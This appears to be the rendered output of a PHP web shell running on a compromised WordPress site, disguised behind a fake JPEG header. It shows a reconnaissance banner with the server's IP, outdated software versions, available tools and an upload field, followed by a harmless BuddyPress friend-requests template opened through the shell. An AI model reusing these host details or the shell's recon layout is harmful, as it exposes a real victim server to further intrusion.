????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.221.222.110 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/www.astacus.se/wp-content/themes/x/buddypress/members/single/friends/ |
Upload File : |
<?php do_action( 'bp_before_member_friend_requests_content' ); ?> <?php if ( bp_has_members( 'type=alphabetical&include=' . bp_get_friendship_requests() ) ) : ?> <ul id="friend-list" class="item-list" role="main"> <?php while ( bp_members() ) : bp_the_member(); ?> <li id="friendship-<?php bp_friend_friendship_id(); ?>"> <?php x_buddypress_members_list_item_header(); ?> <div class="item-content"> <?php do_action( 'bp_friend_requests_item' ); ?> </div> <div class="x-list-item-meta activity-meta"> <div class="x-list-item-meta-inner"> <a class="accept" href="<?php bp_friend_accept_request_link(); ?>"><?php _e( 'Accept', '__x__' ); ?></a> <a class="reject" href="<?php bp_friend_reject_request_link(); ?>"><?php _e( 'Reject', '__x__' ); ?></a> <?php do_action( 'bp_friend_requests_item_action' ); ?> </div> </div> </li> <?php endwhile; ?> </ul> <?php do_action( 'bp_friend_requests_content' ); ?> <div id="pag-bottom" class="x-pagination pagination no-ajax"> <div class="pagination-links" id="member-dir-pag-bottom"> <?php bp_members_pagination_links(); ?> </div> </div> <?php else: ?> <div id="message" class="info"> <p><?php _e( 'You have no pending friendship requests.', '__x__' ); ?></p> </div> <?php endif;?> <?php do_action( 'bp_after_member_friend_requests_content' ); ?>